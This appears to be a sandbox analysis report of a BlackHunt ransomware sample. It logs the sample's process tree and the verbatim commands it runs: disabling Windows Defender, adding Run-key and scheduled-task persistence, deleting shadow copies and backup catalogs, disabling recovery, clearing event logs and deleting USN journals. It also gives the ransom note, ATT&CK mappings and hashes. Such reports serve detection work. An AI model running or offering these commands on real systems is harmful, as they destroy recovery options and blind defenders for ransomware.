139 PID 2392 wrote to memory of 2468 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 182 PID 2392 wrote to memory of 2468 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 182 PID 2392 wrote to memory of 2468 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 182 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe"C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2392 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:2592
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\4⤵
- Enumerates connected drives
PID:1532
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1604
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\4⤵
- Enumerates connected drives
PID:1144
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2192
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1872
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe" /F2⤵PID:2060
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe" /F3⤵
- Creates scheduled task(s)
PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1424
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2416
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2320
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1428
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2040
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:612
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:600
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2324
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1124
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2448
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1940
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2288
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1888
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2116
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2204
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:488
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2732
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵
- Modifies registry class
PID:2592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2412
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2316
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1016
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
- Modifies registry class
PID:2660 -
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2460
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1348
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2468
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2064
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1752
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2764
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2168
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2192
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1904
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe"2⤵
- Deletes itself
PID:1868 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1084
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1864
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1604
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1432
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵PID:1240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1640
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:2676
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:2564
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2224
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2396
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1974290696-1772868881-2095162173-1490549467-360034466-18379910172026985431405758972"1⤵PID:2276
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1763286404872067351-4513085861376129546720220535-10140342481274200092-659357816"1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1240
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1913673875-1386059333-1404470818-1905567538-195424922155338190321386005311563338744"1⤵PID:1908
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2828
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b0006f7d9b15dc4be72e7e7cad60bfea
SHA1a7f2fa928b697574e921dc9280e56c646613145b
SHA25665562ab7032d0bafd9a8d6f5090bf18d4c8687f444cb9b66cb2704db1b48a116
SHA51293d59e5910da9e68bb39d68e1b41897036af4153b4afca47741300ae9ba6dade2357fa2f44a648e011388effa5f29534219f2edb0bca571c68e8361abc157f4d
-
Filesize
12KB
MD593f2ec1cea34e922182bbc34262c4ae5
SHA11c4e645d4abdb37a4095bb50de049ee39894579b
SHA2561ad200c2420cb50e3d78ac5c276b784638a86fd53195bb8676a29b7d2ab1b12a
SHA5129d4c3454447cbdbaa844ab1888aa21f9b6a55923d26368b25ab3ec08e0093eed50c6fbdbe4e62d9a84394a9775218f70b7a3bd4b0dfea69a200f20c5894779ca
-
Filesize
684B
MD5946498a918f79083c8a08f44fe1570c6
SHA1d55c05ec5ba3d7ba6701dac224322f76025ae1ab
SHA25607d5f6ce17543d8a738fb623c7051e61aafced578fddc1a2e7913b0a24061a1a
SHA5120e25a87d0bda8f597f30951df30fd39427d82b738ca52921fed852938fdb1dd0bd6fdfbd8d0da7120e13134dc3ec561614ce0aa92cdf8047f85822f196805f12